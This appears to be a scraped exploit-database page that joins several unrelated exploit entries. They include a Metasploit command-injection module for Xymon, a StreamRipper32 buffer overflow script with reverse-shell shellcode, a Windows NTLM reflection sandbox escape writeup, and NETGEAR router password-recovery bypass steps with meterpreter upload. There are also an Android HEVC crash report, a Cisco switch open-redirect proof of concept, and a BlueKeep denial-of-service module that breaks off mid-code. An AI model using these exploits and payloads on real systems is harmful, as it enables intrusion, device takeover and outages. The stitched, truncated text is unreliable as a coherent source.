ISHACK AI BOT

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'Xymon useradm Command Execution', 'Description' => %q{ This module exploits a command injection vulnerability in Xymon versions before 4.3.25 which allows authenticated users to execute arbitrary operating system commands as the web server user. When adding a new user to the system via the web interface with `useradm.sh`, the user's username and password are passed to `htpasswd` in a call to `system()` without validation. This module has been tested successfully on Xymon version 4.3.10 on Debian 6. }, 'License' => MSF_LICENSE, 'Author' => [ 'Markus Krell', # Discovery 'bcoles' # Metasploit ], 'References' => [ ['CVE', '2016-2056'], ['PACKETSTORM', '135758'], ['URL', 'https://lists.xymon.com/pipermail/xymon/2016-February/042986.html'], ['URL', 'https://www.securityfocus.com/archive/1/537522/100/0/threaded'], ['URL', 'https://sourceforge.net/p/xymon/code/7892/'], ['URL', 'https://www.debian.org/security/2016/dsa-3495'] ], 'DisclosureDate' => '2016-02-14', 'Platform' => %w(unix linux solaris bsd), 'Targets' => [ [ 'Unix CMD', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Payload' => { 'Space' => 2048, 'BadChars' => "\x00\x0A\x0D", 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl python netcat php' } } } ], [ 'Linux', { 'Platform' => 'linux', 'Arch' => [ARCH_X86,ARCH_X64], } ], [ 'Solaris', { 'Platform' => 'solaris', 'Arch' => [ARCH_X86] } ], [ 'BSD', { 'Platform' => 'bsd', 'Arch' => [ARCH_X86, ARCH_X64] } ] ], 'Privileged' => false, 'DefaultTarget' => 0)) register_options([ OptString.new('TARGETURI', [ true, 'The base path to Xymon secure CGI directory', '/xymon-seccgi/' ]), OptString.new('USERNAME', [true, 'The username for Xymon']), OptString.new('PASSWORD', [true, 'The password for Xymon']) ]) end def user datastore['USERNAME'] end def pass datastore['PASSWORD'] end def check res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'useradm.sh'), 'authorization' => basic_auth(user, pass) }) unless res vprint_status "#{peer} - Connection failed" return CheckCode::Unknown end if res.code == 401 vprint_status "#{peer} - Authentication failed" return CheckCode::Unknown end if res.code == 404 vprint_status "#{peer} - useradm.sh not found" return CheckCode::Safe end unless res.body.include?('Xymon') vprint_status "#{peer} - Target is not a Xymon server." return CheckCode::Safe end version = res.body.scan(/>Xymon ([\d\.]+)</).flatten.first unless version vprint_status "#{peer} - Could not determine Xymon version" return CheckCode::Detected end vprint_status "#{peer} - Xymon version #{version}" if Gem::Version.new(version) >= Gem::Version.new('4.3.25') return CheckCode::Safe end CheckCode::Appears end def execute_command(cmd, opts = {}) res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'useradm.sh'), 'method' => 'POST', 'authorization' => basic_auth(user, pass), 'vars_post' => Hash[{ 'USERNAME' => "';#{cmd} & echo '", 'PASSWORD' => '', 'SendCreate' => 'Create' }.to_a.shuffle] }, 5) return if session_created? unless res fail_with(Failure::Unreachable, 'Connection failed') end if res.code == 401 fail_with(Failure::NoAccess, 'Authentication failed') end unless res.code == 500 fail_with(Failure::Unknown, 'Unexpected reply') end print_good "#{peer} - Payload sent successfully" res end def exploit unless [Exploit::CheckCode::Detected, Exploit::CheckCode::Appears].include?(check) fail_with Failure::NotVulnerable, 'Target is not vulnerable' end if payload.arch.first == 'cmd' execute_command(payload.encoded) else execute_cmdstager(linemax: 1_500) end end end

#!/usr/bin/python #Exploit Title: StreamRipper32 Buffer Overflow #Date: 07/2019 #Exploit Author: Andrey Stoykov (OSCP) #Tested On: Win7 SP1 x64 #Software Link: http://streamripper.sourceforge.net/sr32/StreamRipper32_2_6.exe #Version: 2.6 #Steps To Reproduce: Double click on "Add" in the "Station/Song Section" and paste the output in "Song Pattern" file = open('exploit.txt', 'wb') #msfpayload windows/shell_reverse_tcp LHOST=192.168.56.6 EXITFUNC=thread LPORT=4444 R | msfencode -e x86/alpha_mixed -b "\x00\x0a\x0d\xb4\xb8\xbc\xbd\xbe" -f c shellcode = ("\xdb\xd7\xd9\x74\x24\xf4\x59\x49\x49\x49\x49\x49\x49\x49" + "\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" + "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42" + "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75" + "\x4a\x49\x39\x6c\x48\x68\x4b\x39\x53\x30\x65\x50\x63\x30" + "\x45\x30\x4f\x79\x6b\x55\x64\x71\x4b\x62\x42\x44\x4e\x6b" + "\x50\x52\x44\x70\x4e\x6b\x61\x42\x76\x6c\x4e\x6b\x61\x42" + "\x52\x34\x6c\x4b\x54\x32\x46\x48\x56\x6f\x6e\x57\x70\x4a" + "\x37\x56\x35\x61\x79\x6f\x56\x51\x4f\x30\x4c\x6c\x57\x4c" + "\x31\x71\x71\x6c\x46\x62\x46\x4c\x77\x50\x6f\x31\x38\x4f" + "\x66\x6d\x73\x31\x6b\x77\x79\x72\x78\x70\x66\x32\x33\x67" + "\x6e\x6b\x43\x62\x34\x50\x4c\x4b\x43\x72\x75\x6c\x57\x71" + "\x5a\x70\x6c\x4b\x61\x50\x30\x78\x6f\x75\x39\x50\x32\x54" + "\x63\x7a\x36\x61\x4a\x70\x36\x30\x4c\x4b\x51\x58\x34\x58" + "\x4c\x4b\x76\x38\x75\x70\x53\x31\x5a\x73\x79\x73\x35\x6c" + "\x32\x69\x6e\x6b\x66\x54\x4e\x6b\x56\x61\x49\x46\x35\x61" + "\x49\x6f\x74\x71\x6b\x70\x4c\x6c\x49\x51\x7a\x6f\x64\x4d" + "\x55\x51\x79\x57\x54\x78\x49\x70\x32\x55\x58\x74\x44\x43" + "\x73\x4d\x4b\x48\x55\x6b\x33\x4d\x76\x44\x33\x45\x6b\x52" + "\x66\x38\x6c\x4b\x53\x68\x44\x64\x35\x51\x38\x53\x73\x56" + "\x4c\x4b\x54\x4c\x70\x4b\x4c\x4b\x32\x78\x77\x6c\x35\x51" + "\x5a\x73\x6e\x6b\x65\x54\x4c\x4b\x76\x61\x7a\x70\x4e\x69" + "\x30\x44\x44\x64\x61\x34\x71\x4b\x73\x6b\x53\x51\x61\x49" + "\x62\x7a\x42\x71\x4b\x4f\x59\x70\x52\x78\x53\x6f\x62\x7a" + "\x6c\x4b\x57\x62\x4a\x4b\x4f\x76\x73\x6d\x51\x78\x74\x73" + "\x36\x52\x37\x70\x45\x50\x52\x48\x64\x37\x31\x63\x35\x62" + "\x33\x6f\x33\x64\x43\x58\x62\x6c\x33\x47\x36\x46\x37\x77" + "\x39\x6f\x7a\x75\x6f\x48\x6e\x70\x73\x31\x35\x50\x53\x30" + "\x45\x79\x68\x44\x43\x64\x46\x30\x32\x48\x56\x49\x6d\x50" + "\x72\x4b\x33\x30\x39\x6f\x39\x45\x50\x50\x52\x70\x76\x30" + "\x36\x30\x67\x30\x46\x30\x53\x70\x72\x70\x51\x78\x49\x7a" + "\x56\x6f\x39\x4f\x49\x70\x69\x6f\x78\x55\x6b\x39\x6b\x77" + "\x62\x48\x49\x50\x6f\x58\x54\x78\x53\x36\x50\x68\x73\x32" + "\x45\x50\x66\x71\x31\x4c\x4d\x59\x79\x76\x42\x4a\x64\x50" + "\x72\x76\x62\x77\x65\x38\x6e\x79\x6e\x45\x42\x54\x73\x51" + "\x69\x6f\x78\x55\x61\x78\x35\x33\x30\x6d\x51\x74\x57\x70" + "\x6b\x39\x4d\x33\x43\x67\x31\x47\x36\x37\x66\x51\x69\x66" + "\x71\x7a\x75\x42\x32\x79\x62\x76\x59\x72\x69\x6d\x52\x46" + "\x4b\x77\x51\x54\x31\x34\x65\x6c\x77\x71\x55\x51\x6c\x4d" + "\x30\x44\x74\x64\x56\x70\x49\x56\x57\x70\x53\x74\x72\x74" + "\x32\x70\x42\x76\x50\x56\x70\x56\x51\x56\x32\x76\x42\x6e" + "\x66\x36\x33\x66\x73\x63\x66\x36\x45\x38\x64\x39\x58\x4c" + "\x55\x6f\x4c\x46\x79\x6f\x79\x45\x6e\x69\x69\x70\x42\x6e" + "\x61\x46\x77\x36\x49\x6f\x30\x30\x35\x38\x45\x58\x4c\x47" + "\x45\x4d\x51\x70\x79\x6f\x38\x55\x4d\x6b\x4b\x50\x65\x4d" + "\x57\x5a\x55\x5a\x73\x58\x49\x36\x4c\x55\x6d\x6d\x4d\x4d" + "\x59\x6f\x6a\x75\x77\x4c\x64\x46\x73\x4c\x77\x7a\x4b\x30" + "\x59\x6b\x59\x70\x50\x75\x33\x35\x6f\x4b\x61\x57\x46\x73" + "\x62\x52\x70\x6f\x61\x7a\x45\x50\x33\x63\x69\x6f\x78\x55" + "\x41\x41") #74302E3F comctl32.DLL buffer = "A"*256 + "\x3f\x2e\x30\x74" + "\x90"*10 + shellcode + "C"*(260-256-4-10) file.write(buffer) file.close()

VULNERABILITY DETAILS It's possible to use the NTLM reflection attack to escape a browser sandbox in the case where the sandboxed process is allowed to create TCP sockets. In particular, I was able to combine the issues mentioned below with a bug in Chromium to escape its sandbox. ## HTTP -> SMB NTLM reflection This is a long known attack that was described, for example, in https://bugs.chromium.org/p/project-zero/issues/detail?id=222. As far as I can tell, MS16-075 was supposed to to fix it by blocking attempts to reflect NTLM authentication operating in the same machine mode (not sure about the actual internal term for that). However, it's still possible to reflect NTLM authentication that works in the regular remote mode, and an attacker can force the parties to use the remote mode, for example, by clearing the NTLMSSP_NEGOTIATE_OEM_DOMAIN_SUPPLIED flag in the initial NEGOTIATE_MESSAGE message. In the actual exploit, a compromised sandboxed process acts as both a web server and an SMB client, and asks the browser to visit http://localhost:[fake_webserver_port]. The browser receives an NTLM authentication request and considers the `localhost` domain to be safe to automatically log on with the current user's credentials. The sandboxed process forwards the corresponding packets to the local SMB server. The problem here is that since the established session is considered remotely authenticated, it's not allowed to access administrative shares unless the browser process runs at the high integrity level. Therefore, another bug is required to gain file system access. ## Insufficient path check in EFSRPC The Encrypting File System Remote Protocol is a Remote Procedure Call interface that is used to manage data objects stored in an encrypted form. It supports backing up and restoring files over SMB, among other things. Functions like `EfsRpcOpenFileRaw` implement security checks, i.e., they forbid remote users to pass regular file paths. However, if the attacker passes a UNC path of the form `\\localhost\C$\...`, `lsass.exe` will initiate a new SMB connection while impersonating the calling user, but this time using the same machine mode authentication; therefore it will be permitted to access the C$ share. The exploit saves the payload on the user's disk (the easiest way might be just to force it to be auto-downloaded as a .txt file) and calls the EFSRPC methods to copy it as an .exe file to the user's Startup folder. There's also another path check bypass that has been found by James Forshaw. `EfsRpcOpenFileRaw` accepts file paths starting with `\\.\C:\...`, presumably thinking that it's a UNC path since it starts with two back-slashes. Please note that this variant also works in the case where a regular user's credentials are relayed to another machine in a domain, so it might have wider security implications. It's also worth mentioning that the `efsrpc` named pipe might not be enabled by default, but the same RPC endpoint is available on the `lsass` named pipe with UUID [c681d488-d850-11d0-8c52-00c04fd90f7e]. REPRODUCTION CASE The proof-of-concept is based on [impacket](https://github.com/SecureAuthCorp/impacket/). It's a collection of Python classes that supports working with SMB and MSRPC. 1. Run `start.cmd`, which downloads impacket from Github, applies the patch, and starts the server. 2. Open http://localhost/ in a Chromium-based browser. 3. You should see a new .exe file appearing on your desktop. VERSION Microsoft Windows [Version 10.0.17134.648] REFERENCES https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nlmp/b38c36ed-2804-4868-a9ff-8dd3182128e4 https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31 Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47115.zip

# Exploit Title: NETGEAR WiFi Router R6080 - Security Questions Answers Disclosure # Date: 13/07/2019 # Exploit Author: Wadeek # Hardware Version: R6080-100PES # Firmware Version: 1.0.0.34 / 1.0.0.40 # Vendor Homepage: https://www.netgear.com/support/product/R6080.aspx # Firmware Link: http://www.downloads.netgear.com/files/GDC/R6080/(R6080-V1.0.0.34.zip or R6080-V1.0.0.40.zip) == Files Containing Juicy Info == >> http://192.168.1.1/currentsetting.htm Firmware=V1.0.0.34WW Model=R6080 >> http://192.168.1.1:56688/rootDesc.xml (Server: Unspecified, UPnP/1.0, Unspecified) <serialNumber>SSSSSSSNNNNNN</serialNumber> == Security Questions Bypass > Answers Disclosure == >> http://192.168.1.1/401_recovery.htm (SSSSSSSNNNNNN value for input) <POST REQUEST> htpwd_recovery.cgi?id=XXXXXXXXXXXXXXX (one attempt because /tmp/SessionFile.*.htm) (replace) dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=securityquestions.htm&SID= (by) dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=PWD_password.htm&SID= <POST RESPONSE> <input type="text" maxLength="64" size="30" name="answer1" onFocus="this.select();" value="AnSw3R-1"> <input type="text" maxLength="64" size="30" name="answer2" onFocus="this.select();" value="AnSw3R-2"> (repeat recovery process for get admin password) == Authenticated Telnet Command Execution == >> http://admin:[email protected]/setup.cgi?todo=debug :~$ telnet 192.168.1.1 R6080 login: admin Password: Str0nG-!P4ssW0rD { upload by TFTP # tftp -p -r [LOCAL-FILENAME] [IP] [PORT] download by TFTP # tftp -g -r [REMOTE-FILENAME_ELF_32-bit_LSB_executable_MIPS || linux/mipsle/meterpreter/reverse_tcp] [IP] [PORT] } # Exploit Title: NETGEAR WiFi Router JWNR2010v5 - Security Questions Answers Disclosure # Date: 13/07/2019 # Exploit Author: Wadeek # Hardware Version: JWNR2010v5 # Firmware Version: 1.1.0.54 # Vendor Homepage: https://www.netgear.com/support/product/JWNR2010v5.aspx # Firmware Link: http://www.downloads.netgear.com/files/GDC/JNR1010V2/N300-V1.1.0.54_1.0.1.zip # Shodan Dork: "HTTP/1.1 401 Unauthorized" "Set-Cookie: sessionid=" "NETGEAR JWNR2010v5" == Files Containing Juicy Info == >> http://192.168.1.1/currentsetting.htm Firmware=V1.1.0.54 Model=JWNR2010v5 >> http://192.168.1.1/BRS_netgear_success.html (Serial Number) setTimeout('top.location.href = "http://www.netgear.com/success/JWNR2010v5.aspx?sn=SSSSSSSNNNNNN";',2000); == Security Questions Bypass > Answers Disclosure (only if "Password Recovery" is "Enable") == >> http://192.168.1.1/401_recovery.htm (SSSSSSSNNNNNN value for input) <POST REQUEST> htpwd_recovery.cgi?id=XXXXXXXXXXXXXXX (one attempt because /tmp/SessionFile.*.htm) (replace) dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=securityquestions.htm&SID= (by) dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=PWD_password.htm&SID= <POST RESPONSE> <input type="text" maxLength="64" size="30" name="htpwd_answer1" onFocus="this.select();" value="AnSw3R-1"> <input type="text" maxLength="64" size="30" name="htpwd_answer2" onFocus="this.select();" value="AnSw3R-2"> (repeat recovery process for get admin password) == Authenticated Telnet Command Execution == >> http://admin:[email protected]/setup.cgi?todo=debug :~$ telnet 192.168.1.1 JWNR2010v5 login: admin Password: Str0nG-!P4ssW0rD { upload by TFTP # tftp -p -r [LOCAL-FILENAME] [IP] [PORT] download by TFTP # tftp -g -r [REMOTE-FILENAME_ELF_32-bit_LSB_executable_MIPS || linux/mipsle/meterpreter/reverse_tcp] [IP] [PORT] }

CVE-2019-2107 - looks scary. Still remember Stagefright and PNG bugs vulns .... With CVE-2019-2107 the decoder/codec runs under mediacodec user and with properly "crafted" video (with tiles enabled - ps_pps->i1_tiles_enabled_flag) you can possibly do RCE. The codec affected is HVEC (a.k.a H.265 and MPEG-H Part 2) #exploit #rce #android #stagefright #cve More infos LineageOS (Android): 02-11 20:18:48.238 260 260 D FFmpegExtractor: ffmpeg detected media content as 'video/hevc' with confidence 0.08 02-11 20:18:48.239 260 260 I FFMPEG : [hevc @ 0xb348f000] Invalid tile widths. 02-11 20:18:48.239 260 260 I FFMPEG : [hevc @ 0xb348f000] PPS id out of range: 0 02-11 20:18:48.240 260 260 I FFMPEG : [hevc @ 0xb348f000] Invalid tile widths. 02-11 20:18:48.240 260 260 I FFMPEG : [hevc @ 0xb348f000] PPS id out of range: 0 02-11 20:18:48.240 260 260 I FFMPEG : [hevc @ 0xb348f000] Error parsing NAL unit #5. 02-11 20:18:48.240 260 260 I FFMPEG : [hevc @ 0xb348f000] Invalid tile widths. mplayer (laptop) id: 0 [hevc @ 0x7f0bf58a7560]Decoding VPS [hevc @ 0x7f0bf58a7560]Main profile bitstream [hevc @ 0x7f0bf58a7560]Decoding SPS [hevc @ 0x7f0bf58a7560]Main profile bitstream [hevc @ 0x7f0bf58a7560]Decoding VUI [hevc @ 0x7f0bf58a7560]Decoding PPS [hevc @ 0x7f0bf58a7560]Invalid tile widths. [hevc @ 0x7f0bf58a7560]Decoding SEI [hevc @ 0x7f0bf58a7560]Skipped PREFIX SEI 5 [hevc @ 0x7f0bf58a7560]PPS id out of range: 0 [hevc @ 0x7f0bf58a7560]Error parsing NAL unit #5. Error while decoding frame! This stops it when the tile width is bigger than allowed: https://gitlab.freedesktop.org/gstreamer/meson-ports/ffmpeg/blob/ebf648d490448d511b5fe970d76040169e65ef74/libavcodec/hevc_ps.c#L1526 So the check are there. On stock/google Andoird I think it will use libhevc, not ffmpeg, when using VideoPlayer. https://www.droidviews.com/enjoy-hevc-h-265-video-playback-on-android/ I have the google codec: OMX.google.hevc.decoder I am wondering however why it does not crash .... Attaching the video (videopoc.mp4) that should trigger this condition: if (value >= ps_sps->i2_pic_wd_in_ctb - start) + { + return IHEVCD_INVALID_HEADER; + } Maybe somebody have more luck. More infos 2 Whoooo hooo .... made it :) Proof of concept is in hevc-crash-poc.mp4, other videos are for non andoird players. Hvec-"fright" is possible. You can own the mobile by viewing a video with payload. In my example I didn't include real payload. 07-13 21:50:59.000 3351 3351 I /system/bin/tombstoned: received crash request for pid 24089 07-13 21:50:59.006 24089 24089 F DEBUG : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** 07-13 21:50:59.006 24089 24089 F DEBUG : Build fingerprint: 'samsung/hero2ltexx/hero2lte:8.0.0/R16NW/G935FXXS4ESC3:user/release-keys' 07-13 21:50:59.006 24089 24089 F DEBUG : Revision: '9' 07-13 21:50:59.006 24089 24089 F DEBUG : ABI: 'arm64' 07-13 21:50:59.006 24089 24089 F DEBUG : pid: 24089, tid: 24089, name: media.extractor >>> mediaextractor <<< 07-13 21:50:59.006 24089 24089 F DEBUG : signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x7ccb800050 07-13 21:50:59.009 24089 24089 F DEBUG : x0 00000000ffffff36 x1 0000000000000000 x2 00000000000000f0 x3 0000000000000001 07-13 21:50:59.009 24089 24089 F DEBUG : x4 0000000000000001 x5 0000007ccb5df1b8 x6 0000007cc927363e x7 0000007cc8e7bd04 07-13 21:50:59.009 24089 24089 F DEBUG : x8 0000000000004170 x9 0000000000004160 x10 00000000ffffffff x11 0000007ccb7fbef0 07-13 21:50:59.010 24089 24089 F DEBUG : x12 0000007ccb5d3ce0 x13 000000000000001e x14 0000000000000003 x15 0000000000000001 07-13 21:50:59.010 24089 24089 F DEBUG : x16 0000007cc99f5f50 x17 0000007ccb88885c x18 0000007ccb566225 x19 0000007ccb562020 07-13 21:50:59.010 24089 24089 F DEBUG : x20 0000007ccb4f18a0 x21 0000007ccb468c6c x22 0000000000000000 x23 0000000000000006 07-13 21:50:59.010 24089 24089 F DEBUG : x24 000000000000001e x25 0000000000000094 x26 0000000000004160 x27 0000000000000001 07-13 21:50:59.010 24089 24089 F DEBUG : x28 0000007ccb55e750 x29 0000007fd6d39d90 x30 0000007cc99c4438 07-13 21:50:59.010 24089 24089 F DEBUG : sp 0000007fd6d39d20 pc 0000007cc99c44c4 pstate 0000000080000000 07-13 21:50:59.013 24089 24089 F DEBUG : -- Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47119.zip

# Exploit Title: CISCO Small Business 200, 300, 500 Switches Multiple Vulnerabilities. # Shodan query: /config/log_off_page.html # Discovered Date: 07/03/2014 # Reported Date: 08/04/2019 # Exploit Author: Ramikan # Website: http://fact-in-hack.blogspot.com # Vendor Homepage:https://www.cisco.com/c/en/us/products/switches/small-business-300-series-managed-switches/index.html # Affected Devices: The affected products are all Cisco Small Business 200, 300, and 500 Series Managed Switches with the web management interface enabled, # Tested On: Cisco C300 Switch # Version: 1.3.7.18 # CVE : CVE-2019-1943 # CVSS v3: 4.7 (AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N) # Category:Hardware, Web Apps # Reference : https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190717-sbss-redirect ************************************************************************************************************************************* Vulnerability 1: Information Gathering ************************************************************************************************************************************* Unauthenticated user can find the version number and device type by visiting this link directly. Affected URL: /cs703dae2c/device/English/dictionaryLogin.xml ************************************************************************************************************************************* Vulnerability 2: Open Redirect due to host header. ************************************************************************************************************************************* Can change to different domain under the host header and redirect the request to fake website and can be used for phishing attack also can be used for domain fronting. Normal Request GET / HTTP/1.1 Host: 10.1.1.120 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 Connection: close Cache-Control: max-age=0 Normal Response HTTP/1.1 302 Redirect Server: GoAhead-Webs Date: Fri Mar 07 09:40:22 2014 Connection: close Pragma: no-cache Cache-Control: no-cache Content-Type: text/html Location: https://10.21.151.120/cs703dae2c/ <html><head></head><body> This document has moved to a new <a href="https://10.1.1.120/cs703dae2c/">location</a>. Please update your documents to reflect the new location. </body></html> ************************************************************************************************************************************* POC ************************************************************************************************************************************* Host Header changed to different domain (example google.com). Request: GET /cs703dae2c HTTP/1.1 Host: google.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: activeLangId=English; isStackableDevice=false Upgrade-Insecure-Requests: 1 Response: HTTP/1.1 302 Redirect activeLangId=English; isStackableDevice=falseServer: GoAhead-Webs Date: Fri Mar 07 09:45:26 2014 Connection: close Pragma: no-cache Cache-Control: no-cache Content-Type: text/html Location: http://google.com/cs703dae2c/config/log_off_page.htm <html><head></head><body> This document has moved to a new <a href="http://google.com/cs703dae2c/config/log_off_page.htm">location</a>. Please update your documents to reflect the new location. </body></html> The redirection is happening to http://google.com/cs703dae2c/config/log_off_page.htm. The attacker need to be in same network and should be able to modify the victims request on the wire in order to trigger this vulnerabilty. ************************************************************************************************************************************* Attack Vector: ************************************************************************************************************************************* Can be used for domain fronting. curl -k --header "Host: attack.host.net" "domainname of the cisco device" ************************************************************************************************************************************* Vendor Response: ************************************************************************************************************************************* Issue 1: Due to the limited information given out, we are not considering it a vulnerability as such. Still, it would be better if it was not happening, so, we will treat it as a hardening enhancement. Issue 2: The developers won't be able to provide a fix for this in the short term (90 days), so, we are planning to disclose this issue through an advisory on July 17th 2019. We have assigned CVE CVE-2019-1943 for this issue. Reference: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190717-sbss-redirect *************************************************************************************************************************************

# Exploit Title: Bluekeep Denial of Service (metasploit module) # Shodan Dork: port:3389 # Date: 07/14/2019 # Exploit Author: RAMELLA Sebastien (https://github.com/mekhalleh/) # Vendor Homepage: https://microsoft.com # Version: all affected RDP services by cve-2019-0708 # Tested on: Windows XP (32-bits) / Windows 7 (64-bits) # CVE : 2019-0708 # I just modified the initial metasploit module for this vuln to produce a denial of service attack. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary Rank = NormalRanking include Msf::Auxiliary::Dos include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE', 'Description' => %q{ This module checks a range of hosts for the CVE-2019-0708 vulnerability by binding the MS_T120 channel outside of its normal slot and sending DoS packets. }, 'Author' => [ 'National Cyber Security Centre', # Discovery 'JaGoTu', # Module 'zerosum0x0', # Module 'Tom Sellers', # TLS support and documented packets 'RAMELLA Sebastien' # Denial of service module ], 'References' => [ [ 'CVE', '2019-0708' ], [ 'URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708' ] ], 'DisclosureDate' => '2019-05-14', 'License' => MSF_LICENSE, 'Notes' => { 'Stability' => [ CRASH_OS_DOWN ], 'AKA' => ['BlueKeep'] } )) register_options( [ OptAddress.new('RDP_CLIENT_IP', [ true, 'The client IPv4 address to report during connection', '192.168.0.100']), OptString.new('RDP_CLIENT_NAME', [ false, 'The client computer name to report during connection', 'rdesktop']), OptString.new('RDP_DOMAIN', [ false, 'The client domain name to report during connection', '']), OptString.new('RDP_USER', [ false, 'The username to report during connection.']), OptAddressRange.new("RHOSTS", [ true, 'Target address, address range or CIDR identifier']), OptInt.new('RPORT', [true, 'The target TCP port on which the RDP protocol response', 3389]) ] ) end # ------------------------------------------------------------------------- # def bin_to_hex(s) return(s.each_byte.map { | b | b.to_s(16).rjust(2, '0') }.join) end def bytes_to_bignum(bytesIn, order = "little") bytes = bin_to_hex(bytesIn) if(order == "little") bytes = bytes.scan(/../).reverse.join('') end s = "0x" + bytes return(s.to_i(16)) end ## https://www.ruby-forum.com/t/integer-to-byte-string-speed-improvements/67110 def int_to_bytestring(daInt, num_chars = nil) unless(num_chars) bits_needed = Math.log(daInt) / Math.log(2) num_chars = (bits_needed / 8.0).ceil end if(pack_code = { 1 => 'C', 2 => 'S', 4 => 'L' }[ num_chars ]) [daInt].pack(pack_code) else a = (0..(num_chars)).map{ | i | (( daInt >> i*8 ) & 0xFF ).chr }.join a[0..-2] # Seems legit lol! end end def open_connection() begin connect() sock.setsockopt(::Socket::IPPROTO_TCP, ::Socket::TCP_NODELAY, 1) rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e vprint_error("Connection error: #{e.message}") return(false) end return(true) end def rsa_encrypt(bignum, rsexp, rsmod) return((bignum ** rsexp) % rsmod) end # ------------------------------------------------------------------------- # ## Used to abruptly abort scanner for a given host. class RdpCommunicationError < StandardError end ## Define standard RDP constants. class RDPConstants PROTOCOL_RDP = 0 end DEFAULT_CHANNELS_DEFS = "\x04\x00\x00\x00" + # channelCount: 4 ## Channels definitions consist of a name (8 bytes) and options flags ## (4 bytes). Names are up to 7 ANSI characters with null termination. "\x72\x64\x70\x73\x6e\x64\x00\x00" + # rdpsnd "\x0f\x00\x00\xc0" + "\x63\x6c\x69\x70\x72\x64\x72\x00" + # cliprdr "\x00\x00\xa0\xc0" + "\x64\x72\x64\x79\x6e\x76\x63" + # drdynvc "\x00\x00\x00\x80\xc0" + "\x4d\x53\x5f\x54\x31\x32\x30" + # MS_T120 "\x00\x00\x00\x00\x00" ## Builds x.224 Data (DT) TPDU - Section 13.7 def rdp_build_data_tpdu(data) tpkt_length = data.length + 7 "\x03\x00" + # TPKT Header version 03, reserved 0 [tpkt_length].pack("S>") + # TPKT length "\x02\xf0" + # X.224 Data TPDU (2 bytes) "\x80" + # X.224 End Of Transmission (0x80) data end ## Build the X.224 packet, encrypt with Standard RDP Security as needed. ## Default channel_id = 0x03eb = 1003. def rdp_build_pkt(data, rc4enckey = nil, hmackey = nil, channel_id = "\x03\xeb", client_info = false, rdp_sec = true) flags = 0 flags |= 0b1000 if(rdp_sec) # Set SEC_ENCRYPT flags |= 0b1000000 if(client_info) # Set SEC_INFO_PKT pdu = "" ## TS_SECURITY_HEADER - 2.2.8.1.1.2.1 ## Send when the packet is encrypted w/ Standard RDP Security and in all Client Info PDUs. if(client_info || rdp_sec) pdu << [flags].pack("S<") # flags "\x48\x00" = SEC_INFO_PKT | SEC_ENCRYPT pdu << "\x00\x00" # flagsHi end if(rdp_sec) ## Encrypt the payload with RDP Standard Encryption. pdu << rdp_hmac(hmackey, data)[0..7] pdu << rdp_rc4_crypt(rc4enckey, data) else pdu << data end user_data_len = pdu.length udl_with_flag = 0x8000 | user_data_len pkt = "\x64" # sendDataRequest pkt << "\x00\x08" # intiator userId (TODO: for a functional client this isn't static) pkt << channel_id # channelId pkt << "\x70" # dataPriority pkt << [udl_with_flag].pack("S>") pkt << pdu return(rdp_build_data_tpdu(pkt)) end ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/73d01865-2eae-407f-9b2c-87e31daac471 ## Share Control Header - TS_SHARECONTROLHEADER - 2.2.8.1.1.1.1 def rdp_build_share_control_header(type, data, channel_id = "\xf1\x03") total_len = data.length + 6 return( [total_len].pack("S<") + # totalLength - includes all headers [type].pack("S<") + # pduType - flags 16 bit, unsigned channel_id + # PDUSource: 0x03f1 = 1009 data ) end ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/4b5d4c0d-a657-41e9-9c69-d58632f46d31 ## Share Data Header - TS_SHAREDATAHEADER - 2.2.8.1.1.1.2 def rdp_build_share_data_header(type, data) uncompressed_len = data.length + 4 return( "\xea\x03\x01\x00" + # shareId: 66538 "\x00" + # 